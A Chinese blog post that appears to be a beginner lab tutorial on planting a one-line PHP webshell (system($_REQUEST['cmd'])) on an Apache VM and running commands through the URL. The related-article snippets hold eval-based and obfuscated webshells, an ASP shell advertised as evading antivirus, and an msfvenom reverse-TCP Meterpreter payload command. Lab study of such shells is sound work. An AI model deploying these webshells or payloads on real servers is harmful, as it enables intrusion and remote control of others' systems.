远程控制——一句话木马

最新推荐文章于 2024-05-02 17:17:39 发布
最新推荐文章于 2024-05-02 17:17:39 发布
阅读量6.5k 收藏 13
点赞数 4
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Coffilater/article/details/121217437
版权

简单介绍一下远程控制的相关知识

远程控制可以让目标系统上的服务器崩溃,可以在目标系统上执行某个程序,还可以直接控制目标系统。

好的远程控制有:TeamViewer、QQ远程协助、远程管理、实验室上课系统

坏的远程控制有:后门、木马

远程控制有正向连接和反向连接:

正向连接:黑客(客户端)先主动连接木马(服务端)。

反向连接:木马(服务端)主动连接黑客(客户端)诱使Rebecca下载server.EXE并运行。优点是不需知道对方的IP地址和端口。

Shellode:是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

Shell:为使用者提供操作界面的软件(命令解析器)。如windows的cmd.exe。

下面的一句话木马是webshell的应用。

一、连接网络

两个虚拟机要连在同一个子网,都采用桥接方式。

VMware的网络连接方式有三种,详细请以下链接(别人的笔记)。

VMware虚拟机三种网络模式详解--Bridged(桥接模式)_wx5aa8fe213e51f的技术博客_51CTO博客_虚拟机桥接模式VMware虚拟机三种网络模式详解--Bridged(桥接模式),VMware虚拟机三种网络模式详解--Bridged(桥接模式)https://blog.51cto.com/u_13648313/2164307

选定虚拟机,点击右键,设置。

 

kali 桥接会发现没有IP可进入编辑选择网络编辑器修改成连接的无线WiFi网卡。

另一台虚拟机

二、创建.php文件

.php文件是动态网页,所谓的动态网页,是指跟静态网页相对的一种网页编程技术。静态网页,随着html代码的生成,页面的内容和显示效果就基本上不会发生变化了——除非你修改页面代码。而动态网页则不然,页面代码虽然没有变,但是显示的内容却是可以随着时间、环境或者数据库操作的结果而发生改变的。

普通用户有很多权限限制,比如说无法在目录下创建文件,所以要用root超级用户。 

Apache网站根目录默认根目录是在var/www/html, 所以直接在该目录下创建shell.php文件

shell.php的文本为: <?php system($_REQUEST['cmd']);?>

system函数

system函数的作用是执行系统命令,并返回所有结果到标准输出设备上。

如下代码中,用户在浏览器中访问http://localhost/system.php?cmd=ls–al,cmd中的脚本命令将被执行,执行结果输出到页面上。

有关知识点请看别人的笔记:PHP安全:系统命令注入 

PHP安全:系统命令注入_函数

 三、开启端口

nmap扫描80端口是否开放

没开,使用默认端口打开Apache服务

可以看到已经开放了

四、发送命令

在地址栏输入url格式

Apache服务器默认端口为80,如果是别的端口,要在ip地址后面加上端口号http://192.168.43.79:xx(端口号)/shell.php?cmd=ls

ls的命令是不带任何参数运行 ls 命令将列出当前工作目录的内容

其他命令可参考以下链接。

ls 命令详解 | 《Linux就该这么学》Linux 用户常常做的一个事情是:在命令行列出目录内容,我们已经知道,ls和 dir 是两个可用在列出目录内容的 Linux 命令,前者是更受欢迎的,在大多数情况下,是用户的首选。但如何进行更细致的排序,下面将展开讨论。https://www.linuxprobe.com/ls-files.html

 shell.php接受我们传入的参数(也就是后面将被执行的命令),然后命令执行后的结果以网页内容形式传回我们的浏览器。就行啦。

Coffilater
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传漏洞-一句话木马
Coisini的博客
05-30 8467
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
30分钟学会编写一句话木马,并连接菜刀渗透网站
qq_41674664的博客
04-17 6332
木马代码 小马: 一句话木马也称为小马,即整个shell代码量只有一行, -一般是系统执行函数 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到 #### 中国菜刀 shell3.php <?php @eval($_POST[chopper]);?> 或<?php eval($_POST[gmd]);?> 说明: REQUES...
蚁剑连接一句话木马演示
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php一句话木马 其他脚本语言一句话木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,蚁剑等等类似工具,可以去看怎么
web安全之命令执行漏洞
weixin_45997442的博客
04-25 1091
Linux常用管道符:;前面的执行完执行后面的在终端中输入"whoami;ls",查看";“管道符前后两个命令都正确的结果在终端中输入"whoam;ls”,查看";“管道符前面命令错误,后面命令正确的结果在终端中输入"whoami;lss”,查看";“管道符前面命令正确,后面命令错误的结果在终端中输入"whoami|ls”,查看"|“管道符前后两个命令都正确的结果在终端中输入"whoam|ls”,查看"|“管道符前面命令错误,后面命令正确的结果。
一句话木马
aarong的博客
11-26 410
简述 写一个php脚本,实现简单的反向连接操作。 网络环境:NAT模式下的Kali、win2003server 操作过程 写好php代码保存至kali的网站目录/var/www/html,命名为shell.php <?php system($_REQUEST['cmd']);?> 开启apache服务 service apache2 start 在win2003...
一句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5376
前言 一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1339
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
asp一句话.zip
06-28
一句话木马通常是一个简短的ASP脚本,设计用来绕过安全措施,提供远程命令执行的能力。它可能包含在网页源代码中,或者通过注入到其他合法页面中。当恶意用户访问这个页面时,服务器会执行木马中的代码,从而实现对...
kali利用木马病毒远程关机
2302_78587828的博客
08-10 737
利用kali 生成木马并执行,攻击机kali的ip地址192.168.6.50 ,受害机的server ip地址192.168.6.100.在将生成的木马程序名拷贝到受害机上 (方法很多,可以使用putty或者WISCP)也可利用虚拟与主机之间可以复制文件进行文件copy。对受害机进行设定60秒关机操作(shutdown –s –t 60)在受害机桌面上建立文件夹(使用mkdir命令建立任一文件夹)1、使用kali生成木马,木马程序名nxlgwg.exe。2、使用ls命令查看木马文件是否生成成功。
【黑客渗透】-- 远程木马控制
可惜已不在
02-17 3653
随着信息技术的飞速发展,网络搭建和服务器搭建已成为现代社会的基石。它们如同数字世界的骨架,支撑着各类应用的运行,让信息的传递和共享变得前所未有的便捷。然而,这仅仅是开始,对于真正渴望在信息技术领域探索的人们来说,学习的道路上仍有无数高峰等待我们去攀登。此刻,我们正站在一个崭新的起点,带着对知识和技术的渴望,开启一段全新的学习篇章。在这个篇章中,我们将不满足于仅仅搭建起稳固的网络和服务器,更将深入网络攻击.学习新篇章的道路或许充满挑战,但正是这些挑战,将激发我们不断前行的动力。
详细讲解黑客常用的远程控制木马
热门推荐
yakoo5的专栏
11-26 2万+
<!--v/:* {behavior:url(#default#VML);}o/:* {behavior:url(#default#VML);}w/:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}-->  Normal 0 7.8 磅 0
牛逼的一句话木码
Daoke37的博客
05-10 253
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
入侵局域网电脑
擅长写bug,摆烂,白日梦。
12-19 7244
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: X
蚁剑连接一句话木马
m0_64417923的博客
05-18 8210
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
2401_84263434的博客
05-02 1021
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
一句话木马图片转换成php
01-28
一句话木马图片转换成php是指将一个包含恶意代码的图片文件(一句话木马)转换为可执行的php代码。这种操作通常是为了绕过一些安全策略,将恶意代码注入到目标系统中,从而实施各种攻击,如窃取用户信息、篡改网页内容等。 将一句话木马图片转换成php的步骤如下: 1. 首先,需要将图片文件上传到目标服务器。上传方式可以通过网页表单上传,或者利用其他漏洞实现远程文件包含等方式。 2. 接下来,需要对上传的图片进行解析,获取其中的恶意代码。这可以通过读取图片文件的二进制数据,并提取其中特定的标志来完成。 3. 一旦获取到恶意代码,就可以将其转换成可以执行的php代码。这个过程可能涉及到解码、解压缩等操作,以还原原始的php代码。 4. 最后,将得到的php代码执行,就可以实现一句话木马的功能。攻击者可以通过发送特定的请求,触发木马代码的执行,从而控制目标系统。 需要注意的是,上述操作是非法的,且具有很高的风险。一句话木马图片转换成php是黑客攻击的手段之一,目的是为了非法入侵、侵犯他人的隐私、窃取敏感信息等。因此,我们强烈建议遵守法律法规,不要参与任何形式的黑客活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值